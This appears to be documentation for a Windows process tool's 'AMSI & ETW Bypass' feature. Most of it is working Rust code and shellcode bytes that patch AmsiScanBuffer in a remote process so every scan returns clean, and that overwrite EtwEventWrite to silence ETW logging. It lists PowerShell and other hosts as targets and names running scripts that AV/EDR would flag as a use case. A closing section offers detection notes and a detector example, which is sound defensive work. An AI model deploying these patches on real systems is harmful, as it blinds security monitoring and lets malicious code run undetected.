DioProcess

AMSI & ETW Bypass

Ring 3

Patch AMSI and ETW in remote processes to bypass security monitoring and allow unrestricted script/payload execution.

Security Research Only

These techniques are for authorized security research only. Bypassing security mechanisms without authorization may be illegal.

AMSI Hooking

The Antimalware Scan Interface (AMSI) is used by Windows Defender and third-party security products to scan scripts and payloads at runtime. DioProcess can patch AmsiScanBuffer in a remote process to make all scans return clean.

AMSI Hook Algorithm

crates/misc/src/amsi.rs
pub fn hook_amsi(pid: u32) -> Result<(), MiscError> {
    // 1. Open target process with VM permissions
    let handle = OpenProcess(
        PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,
        false, pid
    )?;
    
    // 2. Load amsi.dll locally with DONT_RESOLVE_DLL_REFERENCES
    //    (System DLLs are relocated once per boot and then share the same
    //    base in every process, so the local address is valid in the target)
    let amsi = LoadLibraryExW("amsi.dll", DONT_RESOLVE_DLL_REFERENCES);
    
    // 3. Get AmsiScanBuffer address
    let func_addr = GetProcAddress(amsi, "AmsiScanBuffer");
    
    // 4. Verify code cave before function contains INT3 padding (0xCC)
    //    This is safe space for our hook shellcode
    
    // 5. Write 13-byte hook shellcode to code cave + prolog
    let shellcode = [
        0x31, 0xC0,                         // xor eax, eax (S_OK = 0)
        0x4C, 0x8B, 0x5C, 0x24, 0x30,       // mov r11, [rsp+0x30] (6th param = AMSI_RESULT*)
        0x45, 0x89, 0x03,                   // mov [r11], r8d (*result = AMSI_RESULT_CLEAN)
        0xC3,                               // ret
        // At AmsiScanBuffer entry point:
        0xEB, 0xF3,                         // jmp short -13 (jump to shellcode)
    ];
    
    // 6. WriteProcessMemory to patch the function
    WriteProcessMemory(handle, func_addr - 11, &shellcode, 13)?;
    
    // 7. Flush instruction cache
    FlushInstructionCache(handle, func_addr - 11, 13)?;
    
    Ok(())
}

AMSI Hook Shellcode

The hook uses a code cave technique:

shellcode.asm
; Code cave (before AmsiScanBuffer entry)
xor eax, eax              ; Return S_OK (0)
mov r11, [rsp+0x30]       ; Get AMSI_RESULT* (6th parameter)
mov [r11], r8d            ; *result = AMSI_RESULT_CLEAN (0)
ret                       ; Return to caller

; At AmsiScanBuffer entry point
jmp short -13             ; Jump up to shellcode

Target Processes

AMSI hooking works on any process that loads amsi.dll:

  • powershell.exe — Windows PowerShell
  • pwsh.exe — PowerShell Core
  • cscript.exe / wscript.exe — VBScript/JScript hosts
  • .NET applications — Any managed code host
  • msbuild.exe — MSBuild with inline tasks

ETW Patching

Event Tracing for Windows (ETW) is used by security products to monitor process activity. DioProcess can patch EtwEventWrite in ntdll.dll to disable all ETW logging for a process.

ETW Patch Algorithm

crates/misc/src/etw.rs
pub fn patch_etw(pid: u32) -> Result<(), MiscError> {
    // 1. Open target process
    let handle = OpenProcess(
        PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,
        false, pid
    )?;
    
    // 2. Get EtwEventWrite address in ntdll.dll
    let ntdll = GetModuleHandleW("ntdll.dll");
    let func_addr = GetProcAddress(ntdll, "EtwEventWrite");
    
    // 3. Write 4-byte patch: xor rax, rax; ret
    let patch = [
        0x48, 0x31, 0xC0,  // xor rax, rax (return STATUS_SUCCESS)
        0xC3,              // ret
    ];
    
    // 4. Make memory writable, keeping the previous protection so it can be restored
    let old_protect = VirtualProtectEx(handle, func_addr, 4, PAGE_EXECUTE_READWRITE)?;
    
    // 5. Write patch
    WriteProcessMemory(handle, func_addr, &patch, 4)?;
    
    // 6. Restore the original memory protection returned in step 4
    VirtualProtectEx(handle, func_addr, 4, old_protect)?;
    
    Ok(())
}

ETW Patch Bytes

patch.asm
; Original EtwEventWrite prolog:
; mov r11, rsp
; sub rsp, ...

; Patched to:
xor rax, rax    ; 48 31 C0 - Return STATUS_SUCCESS (0)
ret             ; C3       - Return immediately

UI Access

Both features are accessible from the Process tab context menu:

  • AMSI Hook: Right-click process → Miscellaneous → AMSI Hook
  • ETW Patch: Right-click process → Miscellaneous → ETW Patch

Comparison

Feature           AMSI Hook                 ETW Patch
Target DLL        amsi.dll                  ntdll.dll
Target Function   AmsiScanBuffer            EtwEventWrite
Patch Size        13 bytes (code cave)      4 bytes (inline)
Effect            All scans return clean    All ETW events disabled
Scope             Per-process               Per-process

System-Wide ETW Bypass

For system-wide ETW Threat Intelligence (ETW-TI) bypass, see Kernel Driver > ETWTI Bypass, which disables the ETW-TI provider at the kernel level.

Use Cases

  • Execute PowerShell scripts without AMSI scanning
  • Load .NET assemblies without security inspection
  • Run scripts that would otherwise be flagged by AV/EDR
  • Security research and red team testing
  • Analyze how security products detect these bypasses

Detection Notes

These patches can be detected by:

  • Memory integrity checks comparing .text sections to disk
  • Hook scanning (see Hook Detection)
  • ETW-TI monitoring of memory writes to ntdll.dll
  • Kernel callbacks monitoring write operations
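The first two detection notes (comparing in-memory bytes with the on-disk image, and scanning for hook shapes) can be implemented directly against the two patch layouts documented on this page: a 4-byte `xor rax, rax; ret` stub written inline at EtwEventWrite, and a short backward `jmp` at AmsiScanBuffer into padding that now holds the 11-byte stub. The Rust below is an added example written for this page and is not DioProcess code. It assumes the caller has already read the entry region out of the target process (for example with ReadProcessMemory) and obtained the same bytes from a mapping of the module file; the byte samples are constructed, the `sub rsp` immediate in the EtwEventWrite prologue and the whole AmsiScanBuffer prologue are placeholders, and the names `Region`, `Finding`, `inspect_entry` and `demo` are this example's own.

```rust
/// Bytes around one exported function's entry point: `cave` is the
/// inter-function padding immediately before the entry, `body` starts at the
/// entry itself. One instance holds what was read from process memory, the
/// other what the on-disk image contains at the same offsets.
pub struct Region<'a> {
    pub cave: &'a [u8],
    pub body: &'a [u8],
}

/// What the inspection found; an empty list means the entry looks untouched.
#[derive(Debug, PartialEq, Eq, Clone)]
pub enum Finding {
    /// Function starts with `xor rax, rax; ret` or `xor eax, eax; ret`,
    /// i.e. a stub that returns 0 without doing any work.
    ReturnZeroStub,
    /// Entry point is a short backward jump (EB xx with negative rel8)
    /// into the padding that precedes the function.
    CodeCaveJump { displacement: i8 },
    /// The padding before the entry differs from the on-disk image.
    CavePaddingModified,
    /// Entry bytes in memory differ from the on-disk image; `offset` is the
    /// first differing byte relative to the entry point.
    DiskMismatch { offset: usize },
}

// Byte signatures of the two patch shapes documented on this page.
const XOR_RAX_RET: [u8; 4] = [0x48, 0x31, 0xC0, 0xC3];
const XOR_EAX_RET: [u8; 3] = [0x31, 0xC0, 0xC3];

/// Index of the first byte at which `mem` and `disk` disagree, if any.
/// Only the overlapping prefix is compared, so pass equal-length buffers.
pub fn first_mismatch(mem: &[u8], disk: &[u8]) -> Option<usize> {
    mem.iter().zip(disk).position(|(m, d)| m != d)
}

/// Inspect an entry region read from memory against its on-disk counterpart.
/// Works for any export; it is shown here on the two functions from this page.
pub fn inspect_entry(mem: &Region, disk: &Region) -> Vec<Finding> {
    let mut findings = Vec::new();

    // Hook-shape checks operate on the in-memory bytes alone.
    if mem.body.starts_with(&XOR_RAX_RET) || mem.body.starts_with(&XOR_EAX_RET) {
        findings.push(Finding::ReturnZeroStub);
    }
    if mem.body.len() >= 2 && mem.body[0] == 0xEB {
        let rel = mem.body[1] as i8; // rel8 is sign-extended by the CPU
        if rel < 0 {
            findings.push(Finding::CodeCaveJump { displacement: rel });
        }
    }

    // Integrity checks compare memory with the file image. The prologues of
    // these two functions contain no relocations, so a raw byte compare holds.
    if mem.cave != disk.cave {
        findings.push(Finding::CavePaddingModified);
    }
    if let Some(offset) = first_mismatch(mem.body, disk.body) {
        findings.push(Finding::DiskMismatch { offset });
    }

    findings
}

// Constructed samples (not captured from a real process). The EtwEventWrite
// prologue follows the page's `mov r11, rsp; sub rsp, ...` with a placeholder
// immediate of 0x48; the AmsiScanBuffer prologue is a placeholder
// `push rbx; sub rsp, 0x20`. Padding is INT3 (0xCC) as the page describes.
static DISK_ETW_CAVE: [u8; 8] = [0xCC; 8];
static DISK_ETW_BODY: [u8; 7] = [0x4C, 0x8B, 0xDC, 0x48, 0x83, 0xEC, 0x48];
static MEM_ETW_BODY_PATCHED: [u8; 7] = [0x48, 0x31, 0xC0, 0xC3, 0x83, 0xEC, 0x48];

static DISK_AMSI_CAVE: [u8; 11] = [0xCC; 11];
static DISK_AMSI_BODY: [u8; 5] = [0x53, 0x48, 0x83, 0xEC, 0x20];
static MEM_AMSI_CAVE_PATCHED: [u8; 11] =
    [0x31, 0xC0, 0x4C, 0x8B, 0x5C, 0x24, 0x30, 0x45, 0x89, 0x03, 0xC3];
static MEM_AMSI_BODY_PATCHED: [u8; 5] = [0xEB, 0xF3, 0x83, 0xEC, 0x20];

/// Run the inspection over an untouched entry, the ETW inline patch and the
/// AMSI code-cave patch, returning the three finding lists in that order.
pub fn demo() -> (Vec<Finding>, Vec<Finding>, Vec<Finding>) {
    let etw_disk = Region { cave: &DISK_ETW_CAVE, body: &DISK_ETW_BODY };
    let etw_patched = Region { cave: &DISK_ETW_CAVE, body: &MEM_ETW_BODY_PATCHED };
    let amsi_disk = Region { cave: &DISK_AMSI_CAVE, body: &DISK_AMSI_BODY };
    let amsi_patched = Region { cave: &MEM_AMSI_CAVE_PATCHED, body: &MEM_AMSI_BODY_PATCHED };
    (
        inspect_entry(&etw_disk, &etw_disk),
        inspect_entry(&etw_patched, &etw_disk),
        inspect_entry(&amsi_patched, &amsi_disk),
    )
}

fn main() {
    let (clean, etw, amsi) = demo();
    println!("unpatched entry:  {:?}", clean);
    println!("EtwEventWrite:    {:?}", etw);
    println!("AmsiScanBuffer:   {:?}", amsi);
}
```

A `DiskMismatch` at offset 0 paired with `ReturnZeroStub` or `CodeCaveJump` is the strongest signal; a mismatch on its own is a lead rather than proof, because security products and Windows hotpatching legitimately rewrite some prologues, so a full check should cover the whole .text section with relocations applied and an allow-list for known hooks.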